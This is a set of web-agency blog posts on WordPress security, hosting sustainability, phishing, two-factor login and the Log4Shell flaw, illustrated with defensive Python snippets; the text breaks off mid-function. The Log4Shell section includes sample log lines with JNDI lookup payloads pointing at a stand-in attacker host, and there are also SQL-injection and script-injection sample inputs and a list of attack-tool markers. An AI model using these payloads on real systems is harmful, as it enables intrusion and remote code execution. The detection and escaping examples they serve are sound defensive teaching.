We talk about security a lot in the articles, but we talk about it even more internally as it’s vital we maintain safe and secure sites for our clients.

The threat intelligence team at WordPress security experts Wordfence have recently released their annual report on the state of WordPress’ security. As hosts of many WordPress sites we have to understand the ever-changing landscape in which these sites exist so we can combat likely intrusion points.

The key take-aways from this year’s report were:

That sounds bad – more vulnerabilities means more problems? Not quite. There has been an increase in companies who are CVE Numbering Authorities. CVE stands for “Common Vulnerabilities and Exposures”, and is a publicly available catalogue of known security flaws. Historically many WordPress issues were not reported, but the increase in the number and openness of these authorities has made it much simpler for people to officially disclose security problems.

As WordPress, and the majority of its plugins, are built within the open source ecosystem, anyone can download the code and analyse it. The more people who are looking, the more issues are likely to be found. Finding and reporting such issues is increasingly becoming a full-time occupation for many developers, who are paid through “bug bounty” programs. These help ensure that the bugs don’t end up in the hands of malicious entities, so responsible reporting helps everyone within the ecosystem.

Out of the vulnerabilities reported, the most common issue was Cross-Site Scripting (XSS). With over 1,100 reports in 2022 alone, this accounted for nearly half of all vulnerabilities disclosed. Cross-Site Scripting attacks are a type of injection in which malicious scripts are injected into otherwise benign and trusted websites. More than a third of the XSS issues required administrative permissions on the website itself in order to be successful, so the risk was greatly reduced. This does highlight why users should only be provided with the minimum level of access they absolutely need. WordPress has a strong permissions architecture with varying roles, each with different abilities; Contributor, Author, Editor, Shop Manager and Administrator are the most common.
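To make the idea of script injection a little more concrete, here is a minimal Python sketch of the usual defence: escaping untrusted input before placing it into a page. The `render_comment` function and the sample comment are purely illustrative assumptions and are not taken from WordPress or the Wordfence report.

```python
import html


def render_comment(author: str, comment: str) -> str:
    """Build an HTML fragment from untrusted input (hypothetical helper).

    html.escape converts characters such as < > & and quotes into HTML
    entities, so a browser displays them as text instead of running them.
    """
    safe_author = html.escape(author)
    safe_comment = html.escape(comment)
    return f"<p><strong>{safe_author}</strong>: {safe_comment}</p>"


# An attacker submits a script instead of an ordinary comment.
malicious = '<script>alert("stolen cookie")</script>'
print(render_comment("visitor", malicious))
```

Without the escaping step the browser would treat the comment as a real script tag, which is the essence of an XSS flaw.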

Despite the number of reported XSS vulnerabilities, there were around 3 times as many SQL injection attacks as there were XSS attacks. A SQL injection attack is when an attacker tries to run database commands through a website which has not taken care to sanitise what people enter into forms and other inputs. There was also a comparable number of malicious file upload or inclusion attacks. These might be where someone gains access to the administration area and, rather than the intended image or text, uploads a script to gain further access.
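As a rough illustration of why unsanitised input matters, the sketch below uses Python’s built-in `sqlite3` module with an in-memory database. The table, the usernames and the `find_user` helper are all made up for the example; it simply contrasts building a query by pasting text together with using a parameterised query.

```python
import sqlite3


def find_user(conn: sqlite3.Connection, username: str) -> list:
    """Look up a user safely (hypothetical helper).

    The ? placeholder passes the value separately from the SQL text,
    so it can never be interpreted as part of the command itself.
    """
    cur = conn.execute(
        "SELECT id, username FROM users WHERE username = ?", (username,)
    )
    return cur.fetchall()


conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT)")
conn.executemany("INSERT INTO users (username) VALUES (?)", [("alice",), ("bob",)])

# Input crafted to change the meaning of the query.
attack = "nobody' OR '1'='1"

# Unsafe: the input is pasted straight into the SQL text.
unsafe_sql = f"SELECT id, username FROM users WHERE username = '{attack}'"
unsafe_rows = conn.execute(unsafe_sql).fetchall()

# Safe: the same input is treated purely as a value to compare against.
safe_rows = find_user(conn, attack)

print(len(unsafe_rows), len(safe_rows))
```

The unsafe query returns every user because the attacker’s text became part of the command, while the parameterised version finds nobody with that odd username.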

There are more and more leaked password lists available online as more data breaches occur. Credential stuffing is where hackers use usernames and passwords taken from these lists to try to log in to the admin area of your site. When directories like HaveIBeenPwned (enter your email to see what leaks your info has been a part of) list over 12 billion compromised sets of credentials, it is no wonder that Wordfence collectively blocked over 159 billion login attempts in 2022. Surprisingly, this is actually a slight decrease on 2021.



To keep your site safe please don’t use your WordPress login details on any other site, and make sure that when you create the password it is rated as Strong. These are good principles to apply to any site, and combining them with multi-factor authentication wherever it’s available will make it even more secure.

It has always been important to make sure that the core WordPress code, its plugins, and themes are kept up to date with the latest patches and it is no less true now. It’s obviously good practice for keeping your site secure, but also for extending its overall lifespan. Trying to upgrade very out of date plugins or WordPress code is very time consuming.

Wordfence saw that most attacks targeting specific vulnerabilities were via known, and easily exploitable, flaws in this code on sites that had not received any recent updates. Infotex will take care of your site and make sure that it’s got the latest patches to keep things running smoothly. Indeed, Wordfence stated: “As such, the greatest threat to WordPress security in 2022 was neglect in all its forms”.

The second largest category of attacks was from known malicious “User Agents”. A “User Agent” is the formal term for a browser but also encompasses many other ways in which website content is processed. From Infotex’s own data around 60% of all requests are typically non-human in nature.
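The sketch below shows, in very simplified form, how requests might be sorted by their User Agent string. The marker lists and the sample strings are illustrative assumptions only; they are not Wordfence’s or Infotex’s actual rules, and real User Agent strings are easily forged, so this kind of check is only ever one signal among many.

```python
from collections import Counter

# Illustrative lists only; a real deployment would maintain far larger ones.
KNOWN_SEARCH_BOTS = ("googlebot", "bingbot")
SUSPICIOUS_MARKERS = ("sqlmap", "nikto", "python-requests", "curl")


def classify_user_agent(user_agent: str) -> str:
    """Return a rough category for a User Agent string (hypothetical helper)."""
    ua = user_agent.lower().strip()
    if not ua:
        # Ordinary browsers always send a User Agent, so an empty one is unusual.
        return "suspicious"
    if any(marker in ua for marker in SUSPICIOUS_MARKERS):
        return "suspicious"
    if any(bot in ua for bot in KNOWN_SEARCH_BOTS):
        return "search-bot"
    return "other"


sample_requests = [
    "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36",
    "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)",
    "sqlmap/1.7 (https://sqlmap.org)",
    "",
]

summary = Counter(classify_user_agent(ua) for ua in sample_requests)
print(summary)
```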

In addition to the more legitimate search engine robots (aka “bots”), many of these requests are from bots that have no purpose on a site or system other than to attack it.

A common task for these bots is looking for webshells. A webshell is a script left behind by an attacker who has gained a foothold within a website; it is intended to allow them to retain control and make the server act on the attacker’s behalf. It’s commonplace for attackers to compete for access to webshells, as nefarious access to one can cause huge problems for the site’s owner. Wordfence saw over 23 billion attacks of this type in 2022 across the 4 million+ sites they protect.

The full report is available to download via Wordfence.com

Last Updated July 2023

It is estimated that data centres contribute 2% of all global greenhouse gas emissions – a figure that is rising as digital demand increases. However, by utilising cloud-based services for our hosting we are sharing resources and facilities, which reduces the number of duplicate, energy-hungry single-use servers.

We are conscious that site hosting will have an impact on Infotex’s carbon footprint. Because of this we are always looking to make sure our technical partners have taken, or are taking, steps towards sustainability. Our monitoring systems also help us to ensure that we are using these resources efficiently.

For the hosting of our primary websites and systems we use three main providers: Rackspace, Amazon Web Services (AWS) and iomart.

Rackspace’s approach to the environment is straight-forward: they aspire to give back more than they take from the planet.

In 2019, Rackspace reviewed its energy strategy and opted to focus resources and efforts on energy reduction instead of purchasing carbon offsets.

Rackspace’s UK data centres LON3 and LON5 run on 100% renewable energy. Data centre LON8 does not, though Rackspace publishes an Environmental, Social and Governance Report (2021) showing steps they are taking to be net-zero across all sites by 2045.

Their commitment to a greener business isn’t just limited to energy. They have a host of creative ways to minimise waste in offices, such as composting coffee grounds and shipping pallets, refurbishing retired IT equipment for aftermarket use, and collecting HVAC condensate to maintain landscaping and operate cooling towers.

As part of their route to net zero, they have been publishing a greenhouse gas emissions inventory every year since 2008, covering their global operations.

For further details visit Rackspace’s Corporate Responsibility section of their site.

Amazon Web Services (AWS) is aiming for its global operations to be powered by renewable energy by 2025. The London- and Ireland-based AWS regions (where we host our sites and systems) are currently powered by 95% renewable energy.

In 2019 Amazon launched the UK’s largest wind Corporate Power Purchase Agreement, located in Kintyre Peninsula, Scotland. The new wind farm is expected to produce 168,000 MWh of clean energy annually – enough to power 46,000 UK homes every year.

Amazon provides a Customer Carbon Footprint Tool which allows us to monitor our own carbon emissions and how those would compare to running on-premise computing equivalents – cloud computing can be 80% more efficient in this respect.

For further details visit Amazon’s Sustainability in the Cloud section of their site.

It’s not only carbon emissions that AWS monitor. Their water stewardship programme aims to be water positive (that is, returning more water to communities than they use) by 2030.

All of iomart’s data centres are powered by 100% renewable energy. They continuously evaluate sites to continue to reduce emissions, such as looking at how waste heat can be turned back into usable power. This project won them the ‘Best Use of Emerging Technology’ from the Digital City Awards in March 2022.

In 2022 iomart developed a Carbon Roadmap to help understand their Scope 1 and 2 GHG emissions, and set carbon reduction targets. They also comply with ISO50001 Energy Management to reduce energy usage.

Further details can be found on iomart’s Environmental, Social & Governance page.

This is a topic which started over 10 years ago. It is led by the USA’s Cybersecurity & Infrastructure Security Agency (CISA) and is shared with the European Cyber Security Month (ECSM).

While the topic may seem ethereal and mired in complicated titles, the principle behind it is very simple and one which every business should take time this month to consider if you haven’t already.

October is a month when many businesses start to focus on the busy period ahead. Getting the basics in place before that rush could save you valuable time later on, so here are some thoughts and actionable tips.

Cyber Security starts with the simplest of things, which hopefully everyone reading this knows and implements already:

Infotex have gone through the accreditation process, and while we had a good security understanding beforehand this has helped focus everyone’s attention on the issue.

Phishing is when a fraudulent email is sent to you asking you to take some action, in the belief that the email originated from someone you know. This is one of the biggest threats to any organisation today, with almost a quarter of breaches in the Verizon Data Breach Report 2022 starting via a phishing attack.

It is believed that around 3% of all phishing emails successfully entice their viewer to click the link. The emails are often very convincing using a combination of familiarity, based on information colleagues have posted about themselves online (sometimes unwittingly), and also a sense of urgency. It is always worth taking that moment to check because clicking a fraudulent link could be the start of a chain of events you’ll never forget.

Phishing doesn’t just happen via email. Text messages and phone calls are also becoming more common channels for phishing attackers as awareness of email phishing rises.

Ransomware is designed to prevent you from getting access to the files on your computer by encrypting them. You are then invited to pay a ransom to unlock the files.

It is generally recommended not to pay ransoms as you can’t be sure that the attacker will fulfil their side of the deal. You’re also funding organised crime and encouraging future attacks. It is better to invest in good protection and well-protected, external backups that are not directly connected to any device. Installing good antivirus software costs very little but offers a lot of protection. Maintain a good policy on keeping the operating system and software patches up to date, such as Windows Updates. Finally, running as a limited user rather than an administrator often reduces the damage an attacker can inflict.

Within Cyber Security the term “capture the flag” refers to an exercise whereby one team sets out to obtain some item of data held by another team within the business. If they are able to obtain it then both teams stop, learn how it happened and agree on steps that can be taken to ensure that a genuine attacker could not do so, thus increasing the overall security of the organisation.

You don’t need formal “red & blue teams” to do this; even the smallest of businesses can benefit from trying it. Perhaps start by seeing whether one staff member can find the login password (or passphrase) for another member of staff’s computer. Is it on a post-it attached to their monitor? Is it the name of their child / cat / favourite holiday destination? Do they leave their PC logged in while they take their lunch break, allowing anyone to walk up to and use the PC in their absence?

The aim of Capture The Flag is not to belittle anyone but rather for everyone to learn from the experience and collectively improve your defences.

These are just a few of our thoughts. There’s much more advice available online, as well as events in both the virtual and physical world, but now you’ve read this article do ask yourself: is even that advice genuine, or is someone trying to get information out of you?

We are delighted to announce Infotex have been accepted into the Crown Commercial Digital Outcomes 6 framework, which will be live later this year.

Crown Commercial Service supports the public sector to achieve maximum commercial value when procuring goods and services.

Acceptance onto the framework allows local government and healthcare organisations access to services provided by Infotex. Our ambition is to work more closely with a wider range of organisations in order to design, build, improve and support the back-end systems that sit within healthcare and government to produce better outcomes for all.

Frameworks are agreements between the government and suppliers to supply certain types of services under specific terms. Infotex Ltd have been accepted to provide:

As a digital outcomes supplier, we must:

Jonathan Smith, Director of Infotex Healthcare Systems commented “We are delighted to be accepted onto the framework. It gives us greater opportunity to support the NHS and wider services using our experience in the development of the systems we are already delivering into the care sector”.

“This additional platform reflects the hard work and dedication of our team to really deliver systems in the right way, to the right audience. We can continue to support healthcare teams and patients on the path to better digital assessment and care which is so important.”

Most recently, the team launched a digital self referral platform that allows the smooth and carefully managed assessment of podiatry patients which decreased our client’s 800+ patient backlog to manageable levels within just a few weeks.

Take a look at a review by Dr Hinkes of this system.

In 2019/20, CCS helped the public sector to achieve commercial benefits worth over £1bn – supporting world-class public services that offer best value for taxpayers.

For further information about Infotex’s health systems get in touch.

We all know the importance of keeping tech up to date, whether that be your phone, tablet or laptop. At Infotex we host, support and maintain over 600 client websites, with our DevOps team working tirelessly to ensure that security patches are in place and servers are running smoothly.



As part of our site maintenance we carry out regular updates to all of our WordPress sites, and the next update will bring WordPress 6.0 with which we are including an enhanced CMS (Content Management System) experience for all of our direct clients.

The new-look dashboard will include updated branding, quick access to our support team via a handy form and a news feed, keeping our clients up to date with helpful hints and tips to manage and improve their own site.

WordPress, of course, will continue to allow you to customise your own choice of dashboard widgets, show/hide and reposition any widget should it be required.

This is just the initial release in our plans for improving our WordPress client’s CMS experience and we hope that our clients feel the benefit of these changes.

If you’re considering refreshing your website or just want to chat about how to ensure your site is secure and up to date then get in touch.

The practice of logging into services, also known as authenticating to them, has been around since the 1960s and in many ways not much has changed in the last half-century which, given the pace of development within IT, is quite staggering.

Even today for most purposes you will simply be asked for an email address and a password. Is it right for that to still be the case?

The problem is that email addresses are relatively easy to find or guess, and people are not very good at generating strong, random passwords. Indeed, all too often a password is little more than a word – perhaps your cat or dog’s name. When lists of passwords actually in use are revealed they all too often have entries like “123456”, “qwerty” & “password” filling the top slots.

Back in the 1960s the volume and value of data protected by these passwords was relatively low. Today far more is at stake, and it is quite possible (albeit bad practice) to use the same password across multiple sites. Many of these sites are not administered to the same security standards that we expect from our banks and government bodies, so logins stolen from an insecure website can be used on more secure systems.

So, how are companies increasing security on logins to their sites? There is a computer science theory that a “factor” for authentication must be one of the below:

With a standard login, only knowledge is required, but by adding additional ‘factors’ security is increased. One of the first forms of 2-factor authentication (2FA) was when, in the early 2000s, credit cards went from a simple swipe to “chip & pin”. They changed from a single factor of card possession to 2-factor: possession of the card & knowledge of the PIN.

You may have noticed that more recently a similar change was made when purchasing online via a card as you are now sent a text message to add Possession to the existing Knowledge of the card number.

This is a perfect example of where 2 Factor Authentication (2FA) becomes Multi-Factor Authentication (MFA) as there are scenarios today where all 5 factors are actively being utilised.

In the background the card providers are also doing location checks, i.e. if you purchase an in-store item in London and then another in Manchester within half an hour, the latter will generally be declined as banks know that it is highly unlikely you could have travelled that distance. This has been refined to the extent that I personally had an online banking transaction blocked a few weeks ago because I used a different broadband connection/device combination that had not been seen on my account before, despite using 2 other valid factors to log in.
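The London and Manchester example can be sketched in a few lines of Python. This is only a toy version of such a location check, not how any particular bank does it: the coordinates are approximate city centres, the `max_speed_kmh` limit is an assumed figure, and both function names are made up for illustration.

```python
import math
from datetime import datetime

EARTH_RADIUS_KM = 6371.0


def distance_km(lat1: float, lon1: float, lat2: float, lon2: float) -> float:
    """Great-circle distance between two points using the haversine formula."""
    phi1, phi2 = math.radians(lat1), math.radians(lat2)
    dphi = phi2 - phi1
    dlambda = math.radians(lon2 - lon1)
    a = math.sin(dphi / 2) ** 2 + math.cos(phi1) * math.cos(phi2) * math.sin(dlambda / 2) ** 2
    return 2 * EARTH_RADIUS_KM * math.asin(math.sqrt(a))


def is_plausible_journey(prev, curr, max_speed_kmh: float = 200.0) -> bool:
    """Check whether someone could have travelled between two purchases.

    prev and curr are (latitude, longitude, datetime) tuples.
    max_speed_kmh is an assumed upper limit for ordinary travel.
    """
    (lat1, lon1, t1), (lat2, lon2, t2) = prev, curr
    km = distance_km(lat1, lon1, lat2, lon2)
    hours = (t2 - t1).total_seconds() / 3600
    if hours <= 0:
        # Same moment: only plausible if both purchases are in the same place.
        return km < 1.0
    return km / hours <= max_speed_kmh


london = (51.5074, -0.1278, datetime(2023, 1, 1, 12, 0))
manchester = (53.4808, -2.2426, datetime(2023, 1, 1, 12, 30))
print(is_plausible_journey(london, manchester))
```

With only half an hour between the two purchases the required speed is far above the assumed limit, so the second transaction would be flagged.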

Using text messages is a very simple and ubiquitous way to provide a 2nd factor, however, security weaknesses in the text message system have reduced the security industry’s recommendation of this.

With the prevalence of smartphones you may now find yourself being asked to use an app to generate a multi-digit one-time code. The app combines a secret shared with the website with the current date and time to generate a series of numbers that changes at a short, fixed interval (commonly every 30 seconds). This is known as a Time-based One-Time Passcode (TOTP) and is a way of proving Possession of your phone.
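For the curious, the calculation behind a time-based one-time passcode is published as an open standard (RFC 6238) and is short enough to sketch in Python. The version below assumes the common defaults of a 30-second time step, 6 digits and HMAC-SHA1; the secret shown is the RFC’s published test value and should never be used for a real account.

```python
import hashlib
import hmac
import struct


def totp(secret: bytes, unix_time: int, step: int = 30, digits: int = 6) -> str:
    """Compute a time-based one-time passcode as described in RFC 6238."""
    # Number of whole time steps since the Unix epoch.
    counter = unix_time // step
    # HMAC-SHA1 over the counter, packed as an 8-byte big-endian integer.
    digest = hmac.new(secret, struct.pack(">Q", counter), hashlib.sha1).digest()
    # Dynamic truncation: the low 4 bits of the last byte pick an offset.
    offset = digest[-1] & 0x0F
    value = struct.unpack(">I", digest[offset:offset + 4])[0] & 0x7FFFFFFF
    # Keep the last `digits` decimal digits, padded with leading zeros.
    return str(value % 10 ** digits).zfill(digits)


# Test secret published in RFC 6238 (illustration only).
shared_secret = b"12345678901234567890"
print(totp(shared_secret, unix_time=59))
```

Because the phone and the website both hold the same secret and both know the time, they can each calculate the same code independently, which is why no internet connection is needed on the phone.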

Google Authenticator was the first popular app to embody this very simple yet elegant technology that doesn’t even require the phone to be connected to the web (aside from downloading the app initially).

There are other competitors such as Microsoft Authenticator, LastPass Authenticator and some banking apps which work the opposite way in that the website instead sends a challenge to the app on your phone asking for confirmation that you are logging in and requiring your fingerprint to complete the login. This sends a confirmation back to the website, and you are effectively using 3 factors to complete the login: the username/password combination as Knowledge; phone as Possession and the fingerprint as Inherent.

The question that I’m sure many will still ask is whether all this extra effort is really justified?

In 2019 Microsoft research concluded that 2-factor authentication would prevent 99.9% of the over 300 million daily automated login attacks on their platform.

Google similarly concluded that their use of phone-based authentication prevented “100% of automated bots, 96% of bulk phishing attacks, and 76% of targeted attacks”

In the case of systems like Microsoft Authenticator and Google 2-step verification, having your phone popping up asking you to verify your login unexpectedly also provides early warning that someone has just breached your password and that you need to reset it – suffice to say if it pops up unexpectedly never, ever, approve it!

2-factor and multifactor logins are good techniques to improve security which you should be employing wherever practical (for some certifications such as Cyber Essentials it can even be a requirement). However, this should not replace the need for your actual password to be strong (i.e. containing upper & lower case letters, numbers and punctuation) and unique, as it still remains your first line of defence. You also need to ensure that you keep these additional factors current: when you upgrade your phone, make sure you migrate any authenticator apps, and if you are going overseas consider whether any services you will need have been locked to your country.
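The character mix described above is simple to check in code. The sketch below is a minimal illustration rather than a full strength meter: the `password_issues` name and the minimum length of 12 are assumptions for the example, and it cannot tell whether a password is unique or has already appeared in a leak.

```python
import string


def password_issues(password: str, min_length: int = 12) -> list:
    """List the ways a password falls short of a basic strength policy.

    min_length is an assumed figure chosen for illustration.
    """
    issues = []
    if len(password) < min_length:
        issues.append(f"shorter than {min_length} characters")
    if not any(c.islower() for c in password):
        issues.append("no lower case letter")
    if not any(c.isupper() for c in password):
        issues.append("no upper case letter")
    if not any(c.isdigit() for c in password):
        issues.append("no number")
    if not any(c in string.punctuation for c in password):
        issues.append("no punctuation")
    return issues


print(password_issues("password"))
print(password_issues("Correct-Horse-7-Battery"))
```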

Most website administration areas don’t yet require 2-factor or multifactor logins, but this is gradually changing. WordPress has plugins that can add this capability, so if you would like it added to your site for additional peace of mind please speak with us.

So when you next log in to a site ask yourself whether you can add 2FA to your existing account. You might be surprised: Google, Microsoft, LinkedIn, Facebook and Twitter all offer 2-factor login free of charge.

It ensures our systems are up to date, secure and fit for purpose meaning our clients can rest assured that they are working with a business that is confident in its digital security. Plus, we have the hands-on knowledge to guide their security measures when we develop their websites and systems.

By having a clear picture of our organisation’s cyber security level, we can remain vigilant and keep ourselves ahead of any risk. This further secures our position as a reliable and trusted provider, particularly in the more heavily regulated industries, and strengthens our position to further support larger government-backed organisations.

We signed up for Cyber Essentials Plus as part of our ambition to be transparent, accountable and authentically proactive for higher standards of security and support – meaning our clients can be confident they are in a safe pair of hands.

Our Cyber Essentials and Cyber Essentials Plus reviews were overseen by URM Consulting Services.

Why PLUS is different – self-assessment and independent review of our position

We decided to work to achieve the higher assessment level, Cyber Essentials Plus, which is described as follows: “To achieve Cyber Essentials Plus, you must already be certified to Cyber Essentials. Gaining the extra qualification will also involve a technical expert conducting an on-site or remote audit on your IT systems, including a representative set of user devices, all Internet gateways and all servers with services accessible to unauthenticated Internet users.”

Working with Lauren and the team has allowed us to elevate our security measures and we can step confidently forward knowing we are in the best position to support ourselves and our customers.

URM’s assessor commented, “Infotex has a strong set of controls in place and an exemplary patching process where the organisation is applying the most up-to-date operating systems and system software which provides both security and stability.”

Richard Howlett, a Lead Developer at Infotex said “We are very proud of achieving Cyber Essentials Plus certification. Infotex has made some significant investments in its cyber security infrastructure and this external validation provides a clear demonstration to our clients and partners of our commitment to protecting the organisation from cyber-related attacks.”

Understanding the bigger picture, and the impact COVID and working from home measures have had in the background of businesses.

“The government reports that as many as two in five UK firms have experienced cyber attacks in the last year.”

Throughout the assessment process, we learned that many businesses have experienced issues similar to ours.

Martin Jones, who leads the Cyber Essentials Plus initiative commented “During the COVID-19 pandemic, a significant number of organisations have struggled to keep up-to-date with the latest patch cycles and security updates as the patching systems were kept on the local network. With many, if not all, machines being remote, the patches could not be applied effectively. Some organisations have relied on end-users to apply patches manually, but this relies on the users’ technical aptitude and conscientiousness.”

A significant portion of the effort surrounding mobilising our staff to effectively work from home was the proactive management of our IT kit by our talented and experienced staff members.

This was a key concern for our team, as our stability and security mindfulness directly impacts our clients and their business. We decided to boost our online resilience by taking the proactive steps to work with the team at URM Consulting Services to thoroughly assess our position, and take any necessary corrective steps.

“Infotex managed to keep their applications up-to-date despite the challenges being faced. They achieved this by applying updates remotely and by keeping the number of applications they use to a minimum hence reducing the effort required.”

If you would like to learn more about what we did, and how we can support your business – give us a call. Every project starts with a chat.

Infotex’s primary base of WordPress sites are not affected by this but do check your external systems.

First developed in 1995, Java is a popular programming language that you may be using without even knowing it! All Android phones are based on the Android Runtime which is itself a derivative of Java.

Java is a very structured language known by developers for embodying Object-Oriented-Programming methods and being platform agnostic, i.e. code written in Java will run equally well on Windows, Apple’s MacOS, Android phones and a plethora of esoteric platforms.

At one point it was commonplace to embed Java “applets” into web pages, however due to the power of Java this was found to be a very risky practice and modern browsers do not permit this.

In computing most systems output status updates for diagnostic purposes, some systems make these available to users while others hide them from public scrutiny by writing to logs thus allowing developers to understand what went on when something failed.

Log4j is a utility overseen by the well-known Apache Software Foundation. It is coded in Java and is designed to process log requests, either from Java applications or third parties, and can apply a raft of highly complex rules to understand when a status update is routine vs. critical in nature.

Because it is so powerful yet easy to configure, it has been used for a wide variety of purposes, both bundled with Java systems and deployed to process logs from other systems (one example might be to take web server logs and promptly raise a support ticket when certain classes of error occur).

There is a highly publicised bug in Log4j affecting versions 2.0-beta9 to 2.14.1, which is technically known as CVE-2021-44228 but more commonly by the nickname “Log4Shell”.
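If you have a list of installed Log4j versions, a first-pass check against that range could look like the Python sketch below. It is deliberately simple and rests on some stated assumptions: the function names are made up, pre-release labels such as “-beta9” are ignored (so every 2.0 pre-release is treated as affected, which errs on the side of caution), and it does not account for any patched releases that may exist inside the range. Always confirm against the vendor’s own advisory.

```python
import re

# Range taken from the article: 2.0-beta9 up to and including 2.14.1.
FIRST_AFFECTED = (2, 0, 0)
LAST_AFFECTED = (2, 14, 1)


def parse_version(version: str) -> tuple:
    """Turn '2.14.1' or '2.0-beta9' into a (major, minor, patch) tuple."""
    match = re.match(r"^(\d+)\.(\d+)(?:\.(\d+))?", version.strip())
    if not match:
        raise ValueError(f"unrecognised version: {version!r}")
    major, minor, patch = match.group(1), match.group(2), match.group(3)
    return (int(major), int(minor), int(patch or 0))


def is_in_affected_range(version: str) -> bool:
    """Rough check for whether a Log4j version falls in the affected range."""
    return FIRST_AFFECTED <= parse_version(version) <= LAST_AFFECTED


for v in ("1.2.17", "2.0-beta9", "2.14.1", "2.15.0", "2.16.0"):
    print(v, is_in_affected_range(v))
```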

This was announced on 9th Dec 2021. It appears attackers had been taking advantage of it for at least a week prior, before its maintainers were even aware of it, and as such it is given the “zero-day” moniker. It scores the highest possible severity rating of 10/10.

Basically, on systems not configured with formatMsgNoLookups, the vulnerability allowed an attacker to create a request which would be processed by Java’s Naming & Directory Interface (JNDI) and would cause the server to make an external request and potentially execute code provided by a third-party attacker. That’s about as bad as things can get when a system is intended to process logs that anyone can initiate in web scenarios.
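Attack attempts of this kind typically show up in logs as text containing a `${jndi:` lookup. The Python sketch below searches log lines for that marker. It is only a first-pass illustration: the sample log lines and the `attacker.example` address are invented, and attackers are known to disguise the string in ways a simple pattern like this will miss, so a clean result proves nothing on its own.

```python
import re

# Matches the start of a JNDI lookup, ignoring upper/lower case.
JNDI_PATTERN = re.compile(r"\$\{jndi:", re.IGNORECASE)


def suspicious_lines(lines):
    """Return the log lines that contain a plain JNDI lookup string."""
    return [line for line in lines if JNDI_PATTERN.search(line)]


# Invented sample entries for illustration.
sample_log = [
    '203.0.113.5 "GET /index.php HTTP/1.1" 200 "Mozilla/5.0"',
    '203.0.113.9 "GET / HTTP/1.1" 200 "${jndi:ldap://attacker.example/a}"',
    '203.0.113.7 "GET /?q=${JNDI:rmi://attacker.example/b} HTTP/1.1" 404 "-"',
]

for line in suspicious_lines(sample_log):
    print(line)
```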

There are already reports of attackers using this bug to run bitcoin miners earning money for the attacker on afflicted servers.

Fixes were provided by log4j’s maintainers in version 2.15 with a subsequent release to more fully disable potential attack vectors in 2.16.

The US Cybersecurity and Infrastructure Security Agency (CISA) estimates that there are hundreds of millions of devices that are (or were) vulnerable to Log4Shell.

Infotex’s core online platform is WordPress which runs on a PHP platform and none of our log processors run log4j, nor do our client servers have Java installed.

As such our primary base of client sites are not affected.

Since the news of this vulnerability broke on Friday our team reached out to a number of specialist suppliers who offer services (e.g. custom search facilities) to specific clients which could be impacted and have received confirmation from those suppliers that fixes are being, or have already been deployed.

We have also evaluated a number of tools that we use internally (Log4j is also in use on some desktop utilities although the window of opportunity for an attacker there is minute as those systems are not available for attack online) and we have installed updates where applicable for these tools.

We frequently recommend Cloudflare as a security & performance option to clients and it is worth noting that any websites with Cloudflare’s WAF deployed were protected from attack soon after news of this issue broke as they enabled an emergency firewall rule to block potential exploits.

If your website is managed and hosted by Infotex then the likelihood is that you do not need to take any action. If you have websites hosted by anyone else, then you will need to check with those respective hosts to clarify their position. You should also check that you do not have any vulnerable installations of Log4j on your desktop or devices within your business, as it can be utilised in desktop programs.

There are several resources online trying to pull together software vendors’ statements clarifying whether any updates are needed.

One such list can be found at: https://gist.github.com/SwitHak/b66db3a06c2955a9cb71a8718970c592

Keeping your computers and website safe is a constantly evolving challenge and requires co-operation from all parties and this demonstrates the need to know who provides what and ensure that they are managing those systems effectively.

Behind all the glamour of new and redesigned websites, a large part of Infotex’s time and energy is spent “keeping the lights on”, i.e. managing all the little bits that ensure your website remains fit-for-purpose.

Much of this work is never directly seen by clients or website visitors, so in this article we wanted to let you know of a few bits that we’ve been working on recently.

WordPress is a platform that never sleeps; powering around 1/3rd of all websites, it is constantly under scrutiny, having features added and bugs fixed. As a result, the WordPress team publishes major updates around 3-4 times per year and some plugin authors push out updates very frequently.

Infotex’s policy from hard-earned experience is that, with the exception of security releases, it is best to apply updates in a timely manner but not immediately after release. This is because it is often the case that new updates to the WordPress core cause compatibility issues with plugins and/or themes, which can be annoying to our customers and time consuming to work around, yet are often patched by the plugin authors within a few weeks.
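Expressed as a rule, the policy above might look something like the Python sketch below. It is an illustration only, not our actual tooling: the function name is made up and the 14-day settling period is an assumed figure standing in for “a few weeks”.

```python
from datetime import date, timedelta


def earliest_install_date(
    release_date: date, is_security_release: bool, settle_days: int = 14
) -> date:
    """Work out when an update becomes eligible for installation.

    Security releases are eligible straight away; other releases wait for
    an assumed settling period so compatibility issues can surface first.
    """
    if is_security_release:
        return release_date
    return release_date + timedelta(days=settle_days)


released = date(2021, 9, 9)
print(earliest_install_date(released, is_security_release=True))
print(earliest_install_date(released, is_security_release=False))
```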

We have just finished deploying WordPress 5.8.1 to our fleet of sites under maintenance contract.

In the last month, we have also separately installed security updates to plugins which were evaluated by our team and felt to be of an urgent nature – such updates are often installed within hours of their release to keep our clients safe.

We are in the process of changing the architecture for some legacy sites to allow us to perform updates more efficiently (especially updates of commercial plugins). And automated testing will come online soon, to further improve the customer experience – more on this in due course.

Just as WordPress itself is constantly evolving, so are the servers which we host it on.

All of these servers are checked for security updates at least once per week to keep them secure.

We have now started to deploy the latest evolution of our preferred server operating system, called CentOS Stream 8. Stream is the future of CentOS Linux and will allow us to offer newer technology earlier in the lifecycle than was previously possible. We will be migrating sites to this platform over the coming months. In addition, we are working through the process of testing and migrating our fleet of servers to PHP 7.4, which gives the latest features and performance benefits. In some cases this upgrade requires changes to our client websites to provide compatibility, but we aim for the change to be seamless.

With SSL/TLS now being a de facto standard on websites and email solutions, we continue to create internal automation to both monitor certificates and renew them sooner. We now typically renew website certificates every 60 days, as short-lived certificates provide additional “defence in depth” security benefits. We have also recently renewed and upgraded the strength of the certificate that protects our Flexidial client email system.
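As an illustration of the kind of monitoring described above, here is a minimal sketch in Python that works out how many days a certificate has left. It is not Infotex's actual tooling: the function names and the 30-day warning threshold are assumptions made for this example.

```python
import socket
import ssl
from datetime import datetime, timezone


def days_until_expiry(not_after: str, now: datetime) -> float:
    """Days between `now` and a certificate's notAfter timestamp.

    `not_after` uses the format found in ssl.SSLSocket.getpeercert(),
    for example "Jan  5 09:34:43 2018 GMT".
    """
    expiry_epoch = ssl.cert_time_to_seconds(not_after)
    return (expiry_epoch - now.timestamp()) / 86400


def needs_renewal(not_after: str, now: datetime, threshold_days: float = 30) -> bool:
    """True when fewer than `threshold_days` remain (threshold is an assumption)."""
    return days_until_expiry(not_after, now) < threshold_days


def fetch_not_after(host: str, port: int = 443) -> str:
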